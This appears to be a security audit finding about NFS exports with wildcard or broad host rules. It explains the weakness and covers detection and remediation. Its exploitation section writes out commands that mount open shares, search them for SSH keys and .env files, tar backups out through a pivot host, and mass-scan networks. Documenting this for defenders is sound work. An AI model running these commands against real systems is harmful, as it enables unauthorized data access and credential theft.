Skip to content

F-7.1: Wildcard and Overly Permissive Export Policies

Classification

  • Severity: High
  • CVSS Vector: Network / Low Complexity / No Auth Required
  • Affected Versions: All NFS versions
  • Configuration: Wildcard * or broad subnet in /etc/exports
  • Prerequisite: Network connectivity to target (same subnet or routable)

Summary

NFS exports configured with wildcard host specifiers (*) or overly broad subnets allow any machine on the network to mount and access the shared filesystem. Combined with AUTH_SYS (the default), this means anyone on the network segment can access all non-root-owned files on the export with zero authentication.

Technical detail

Vulnerable configurations

# /etc/exports - worst to less bad:

# Anyone in the world can mount (if routable)
/srv/data    *(rw,sync,no_subtree_check)

# Entire /16 subnet (65,534 potential hosts)
/srv/data    192.168.0.0/16(rw,sync)

# Entire domain (depends on DNS — spoofable)
/srv/data    *.company.com(rw,sync)

# Stale/decommissioned hosts still in ACL
/srv/data    old-server.internal(rw) decomm-host(rw)

How access control works

  1. Client sends MOUNT RPC to mountd
  2. Server resolves client IP via reverse DNS (if hostname-based ACL)
  3. Server checks if client matches any entry in the export's allowed hosts
  4. If matched, returns the root file handle for the export
  5. Subsequent NFS operations only check the source IP against the export list

Why wildcards are dangerous

  • * matches any host — including attacker machines connected to the same network
  • No authentication beyond "can you reach port 2049 from an allowed IP?"
  • Combined with AUTH_SYS: full read/write access to all non-root files
  • showmount -e publicly advertises that the export is wide open

Reconnaissance

$ showmount -e target
Export list for target:
/home/engineering   *
/srv/backups        192.168.0.0/16
/var/shared         *.internal.corp

An attacker sees immediately: - /home/engineering is accessible from anywhere - /srv/backups accessible from any host in the /16 - /var/shared accessible if you can spoof DNS

Exploitation

Direct mount (wildcard export)

# Nothing stops us — export allows "*"
mount -t nfs -o vers=3,nolock target:/home/engineering /mnt/loot

# Browse all engineering home directories
find /mnt/loot -name "*.pem" -o -name "id_rsa" -o -name "*.env" 2>/dev/null

Subnet exploitation

If the attacker is on a different subnet but has access to a machine in the allowed range:

# Pivot through a compromised host in the allowed subnet
ssh pivot-host "mount -t nfs target:/srv/backups /mnt && tar czf - /mnt" > backups.tar.gz

# Or assign yourself an IP in the allowed range (if on same L2)
ip addr add 192.168.1.200/24 dev eth0
mount -t nfs target:/srv/backups /mnt

Hostname spoofing

For exports restricted by hostname with DNS-based resolution:

# If you control DNS or can poison it:
# Set reverse DNS for your IP to match the allowed hostname
# Or use an existing machine whose hostname matches

# The server does: gethostbyaddr(client_ip) -> must match export ACL
# Vulnerable to DNS rebinding / poisoning attacks

Mass scanning for open exports

# Scan network for NFS servers with open exports
nmap -p 111,2049 --script nfs-showmount 192.168.0.0/16

# Or with showmount
for ip in $(nmap -p 2049 --open -oG - 192.168.0.0/24 | grep open | awk '{print $2}'); do
    echo "=== $ip ==="
    showmount -e $ip 2>/dev/null
done

Shodan/Internet exposure

NFS shares exposed to the internet are indexed by search engines:

# Shodan query
port:2049 nfs
port:111 "exports"

Impact

  • Zero-effort data access: No credentials, no exploitation, just mount and browse
  • Backup exposure: VM backups, database dumps, full system images
  • Credential theft: SSH keys, certificates, config files with passwords
  • Intellectual property: Source code, R&D data, financial documents
  • Compliance violation: PII, PHI, PCI data exposed to unauthorized hosts
  • Pivot point: Use stolen credentials/keys to move laterally

Detection

  • Monitor showmount -a / rmtab for unexpected client connections
  • Alert on new source IPs mounting exports
  • Periodic audit of /etc/exports for wildcards
  • Network monitoring for mount RPC from unexpected sources

Remediation

  1. Never use * — always specify exact IPs or minimal subnets:

    /srv/data  192.168.1.10(rw) 192.168.1.11(rw)
    

  2. Use netgroups for dynamic host lists (hides membership from showmount):

    /srv/data  @trusted_nfs_clients(rw)
    

  3. Firewall NFS ports: iptables/nftables rules restricting 111, 2049, and dynamic RPC ports

  4. Regular audits: Script to check for wildcards in exports:

    grep -E '^\s*/' /etc/exports | grep -E '\*|\(' | grep -v '^#'
    

  5. Decommission stale entries: Remove hosts that no longer exist

  6. NFSv4-only mode: Disable NFSv3 to reduce enumeration surface (no mountd/showmount)